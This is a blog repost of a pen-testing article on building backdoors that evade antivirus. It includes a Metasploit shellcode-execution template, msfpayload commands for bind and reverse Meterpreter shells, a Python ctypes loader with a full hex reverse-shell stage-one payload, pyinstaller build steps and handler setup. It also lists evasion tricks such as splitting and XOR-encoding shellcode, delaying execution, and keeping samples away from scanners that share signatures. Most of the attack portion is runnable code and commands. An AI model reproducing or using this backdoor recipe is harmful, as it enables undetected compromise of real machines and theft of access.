Oct 14, 2011

Create Backdoor With Evading Antivirus

If you want to see full detail, please go to the Source.

TIP #1: Do your reconnaissance. Know what antivirus software target system personnel are running. While it is certainly possible to make a backdoor that evades all antivirus software products, there is no need to waste those cycles if your target is only running one product, a significant likelihood. Narrow down your options by getting this information from target system personnel by asking, looking for information leakage such as e-mails footers that proclaim the AV product, or even a friendly social engineering phone call if such interaction is allowed in your rules of engagement.

TIP #2: If you want to use your backdoor for more than one project, do not submit it to virustotal.com or any of the other online sandboxes/scanner that work with antivirus software companies to generate new signatures. Instead, buy a copy of the antivirus product used by your target organization and test it on your own systems. Alternatively if your target is using one of the nine AV products scanned by VirusNoThanks, you could use http://vscan.novirusthanks.org/ and be sure to select "Do no distribute the sample" at the bottom of the page.

TIP #3: KISS — Keep it simple, shell-boy. I'm a minimalist when it comes to remote access. I just need enough to get in, disable antivirus (if the rules of engagement will allow it), and then move in with more full-featured tools. This approach requires less coding on my part and there is less of a chance that I will incorporate something that antivirus doesn't like.

TIP #4: You don't have to COMPLETELY reinvent this wheel. Metasploit has templates in the data/templates/src directory for DLLs, EXEs, and Windows Services. Start with them and modify them only as required to avoid your target's defenses. For example:
$ cat data/templates/src/pe/exe/template.c

#define SCSIZE 4096
char payload[SCSIZE] = "PAYLOAD:";

char comment[512] = "";
int main(int argc, char **argv) {
        (*(void (*)()) payload)();

You can set the payload[SCSIZE] array to any shell code that meets your needs and compile it. There are plenty of options out there for shell code. You can get several examples of shell code from exploit-db (http://www.exploit-db.com/shellcode/) and many of them do not trigger antivirus software. Or, you can also use msfpayload or msfvenom from Metasploit to generate C shell code and plug that into the template. For example:

$ ./msfpayload windows/shell_bind_tcp C

This generates C shell code to bind a shell to TCP port 4444. Compile it, and check to see if the AV product running in your lab detects it. If the compiled program is detected, you have a lot of flexibility in source code. You can try:

- Moving part of your shell code to a different data segment

- Compile it to different PE, Old EXE, or COM (yes... I said .COM) formats

- Break the shell code up into smaller strings and mix the order in the source code. Then reassemble it into a variable in memory in the correct order before calling it

- Use timed events or wait() functions to delay the payload execution to avoid heuristic engines

- Create your own simple encoding engine to mask the bytes... it is easier than you think! Check out http://www.cprogramming.com/tutorial/xor.html

I like writing in Python, then using pyinstaller to create an exe out of my Python script. Here is a Python template I wrote that does the same thing as the C template provided with Metasploit:
from ctypes import *
shellcode = ''

memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))

If you want to use a Metasploit payload as your shell code, you can easily turn C source into a Python-compatible string by deleting all the double quotes and new lines using the handy tr command as follows:

$ ./msfpayload windows/shell_bind_tcp C | tr —d '"' | tr —d '\n'

If you generate a multi-stage payload, just grab the string for stage one. For example, to create a Metasploit framework reverse Meterpreter, I would do the following:

$ ./msfpayload windows/meterpreter/reverse_tcp LHOST= C | tr -d '"' | tr -d '\n' | more

Then grab the string produced for STAGE1 and plug it into my template as follows:

from ctypes import *
shellcode = '\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3'

memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))

Next, I'll compile my new backdoor with pyinstaller with the following options:

$ python configure.py
$ python makespec.py --onefile --noconsole shell_template.py
$ python build.py shell_template\shell_template.spec

To use the new payload we setup the Metasploit framework with the multi-handler "exploit". Once our program is run on the target, it connects back to the framework where stage2 is delivered.

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST LHOST =>
msf exploit(handler) > exploit

Source: http://pen-testing.sans.org/blog/2011/10/13/tips-for-evading-anti-virus-during-pen-testing


If you like my blog, Please Donate Me

1 comment:

Isabelle Cole said...

The information provided on how to secure source code is very useful. I like the way you write article. good one.